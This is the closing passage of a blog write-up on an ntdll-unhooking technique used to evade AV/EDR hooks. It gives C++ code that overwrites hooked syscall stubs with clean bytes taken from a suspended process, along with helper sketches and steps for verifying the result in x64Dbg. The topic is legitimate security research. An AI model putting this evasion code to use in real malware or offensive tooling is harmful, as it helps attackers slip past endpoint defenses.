		ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
	}
}
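One thing to note about the name check: strstr matches "Nt" anywhere in the name, so an export such as RtlNtStatusToDosError also passes it and is only rejected later, when GetTableEntry fails to find a syscall stub. The following minimal sketch compares the substring test with a prefix test. The helper names HasNtPrefix and ContainsNt are made up for this illustration and are not in the POC.

```cpp
#include <cassert>
#include <cstring>

// True only when the export name starts with "Nt".
inline bool HasNtPrefix(const char* name) {
    assert(name != nullptr);
    return std::strncmp(name, "Nt", 2) == 0;
}

// The substring test used in the listing, kept here for comparison.
inline bool ContainsNt(const char* name) {
    assert(name != nullptr);
    return std::strstr(name, "Nt") != nullptr;
}
```

A prefix test sends fewer names to GetTableEntry. The stub check is still needed, because not every export that starts with "Nt" is a syscall stub.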

If it is a Nt function, then it extracts the function address of that same function from the fresh ntdll
Then it checks whether there has been an error, by checking if funcAddress is 0x00
Before we can overwrite the hooked API with the correct bytes, we need to change the access permissions of that memory region. Here I am using PAGE_EXECUTE_WRITECOPY, which is the bare minimum permission that we need (the full listing above uses PAGE_EXECUTE_READWRITE, which also works)

DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);

The ChangePerms() function works as follows:

DWORD ChangePerms(PVOID textBase, DWORD flProtect, SIZE_T size)
{
	DWORD oldprotect;
	VirtualProtect(textBase, size, flProtect, &oldprotect);
	return oldprotect;
}

After changing the permissions of the memory region to allow writing, we use memcpy to write 23 bytes to it.
The POC treats the syscall stub as 23 bytes long

std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);

Once we have overwritten the stub with the clean bytes, we change the permissions back to their original value

ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
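The POC overwrites every Nt stub it finds, whether it was hooked or not. One possible variation, shown here as a minimal sketch and not as what the POC does, is to compare the live stub with the fresh one first and only write when they differ. The names kStubSize and RestoreStub are my own. The caller would still have to make the page writable around the call, for example with ChangePerms().

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Stub length used by the POC.
constexpr std::size_t kStubSize = 23;

// Copies the clean stub over the live one only when they differ.
// Returns how many bytes differed before the copy (0 means it was untouched).
inline std::size_t RestoreStub(std::uint8_t* live, const std::uint8_t* clean) {
    assert(live != nullptr && clean != nullptr);
    std::size_t changed = 0;
    for (std::size_t i = 0; i < kStubSize; ++i) {
        if (live[i] != clean[i]) ++changed;
    }
    if (changed != 0) {
        std::memcpy(live, clean, kStubSize);
    }
    return changed;
}
```

The return value doubles as a cheap report of which functions were hooked: any non-zero count means the live bytes had been modified.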

Tying up loose ends

Once the ntdll has been unhooked, we can finally terminate the suspended process using the TerminateProcess API

TerminateProcess(hProcess, 0);

Testing the POC

Now that we have completely understood the working of our POC, we can test it against any AV/EDR. The POC does not have any injection code which can lead to code execution. Leaving it out helps us understand the code fully without straying from the nuances of the actual technique. Also, it takes a lot more work to get an agent callback against the EDR that I was testing my code against. This POC just focuses on the unhooking aspect of the technique.

In order to test the POC, we need our program to wait for a user input before unhooking. During this time, we can attach a debugger to it

Here we can see that our program is waiting for user input. Now attach x64Dbg to it

We can see both the suspended process and the parent process
We attach the debugger to the parent process

Search for the NtCreateThread API from the ntdll.dll module
We pick this API because most AV/EDRs don’t hook each and every function, in order to reduce the amount of computation needed as well as to reduce false positives.

Checking the function, we see that there is a jmp statement for this function, instead of the syscall stub. However, this is not the case with the next function.
This is because NtCreateThread is widely used by malware.
Now we continue with the execution of our program by pressing enter

We see that it has successfully executed
Now let’s check on the NtCreateThread API

We see that there is now a normal syscall stub instead of the jmp statement as we had seen previously.
This shows that we have successfully unhooked the ntdll.dll of the current process using a novel technique
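The before and after comparison that we did by eye in x64Dbg can also be expressed in code. The following is a minimal sketch under one loud assumption: the hook is a 5-byte jmp rel32 (opcode 0xE9) placed on the very first byte of the function. This matches the jmp we saw here, but other products may patch differently. The names StubState, ClassifyStub and JmpTarget are made up for this illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

enum class StubState { Clean, JmpHook, Unknown };

// Classify the first bytes of an Nt function.
inline StubState ClassifyStub(const std::uint8_t* stub, std::size_t len) {
    assert(stub != nullptr);
    // mov r10, rcx ; mov eax, imm32
    if (len >= 4 && stub[0] == 0x4C && stub[1] == 0x8B &&
        stub[2] == 0xD1 && stub[3] == 0xB8) {
        return StubState::Clean;
    }
    // Assumption: the hook is a jmp rel32 at offset 0.
    if (len >= 5 && stub[0] == 0xE9) {
        return StubState::JmpHook;
    }
    return StubState::Unknown;
}

// For a jmp rel32 located at `address`, compute where it lands:
// the displacement is relative to the end of the 5-byte instruction.
inline std::uint64_t JmpTarget(std::uint64_t address, const std::uint8_t* stub) {
    assert(stub != nullptr && stub[0] == 0xE9);
    const std::uint32_t raw = static_cast<std::uint32_t>(stub[1]) |
                              (static_cast<std::uint32_t>(stub[2]) << 8) |
                              (static_cast<std::uint32_t>(stub[3]) << 16) |
                              (static_cast<std::uint32_t>(stub[4]) << 24);
    const std::int32_t rel = static_cast<std::int32_t>(raw);
    return address + 5 + static_cast<std::int64_t>(rel);
}
```

Running ClassifyStub over a function before and after the unhooking would be expected to go from JmpHook to Clean for a hooked API such as NtCreateThread.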

Conclusion

This technique is indeed a very interesting and fun way to unhook ntdll. It builds on the basic fact that when a process is created, only ntdll.dll is loaded at first and the other modules follow later, and it takes advantage of this very well.

However, while writing this code and adding my own changes to it, I felt that the technique was becoming unnecessarily complex. There may be ways to make it simpler and better, but it all comes down to the fact that there are still many better evasion techniques than this. Also, to overwrite the hooked ntdll you need to change the permissions of the memory region to PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, which can be easily flagged by most AV/EDR software.

While working on this POC, I learned a lot about how modules are loaded in processes and how you can navigate through the Export Table. That’s what makes it a great learning experience for me, and I’d love to take the courses offered by Sektor7. Even with the simple blog, they have inspired me to hop into the rabbit hole and emerge as a more knowledgeable hacker.

All credit for the original concept and theory goes to Sektor7.

My POC code at : https://github.com/dosxuz/PerunsFart

References

2022-05-14

https://dosxuz.gitlab.io/post/perunsfart/ Ritaban Das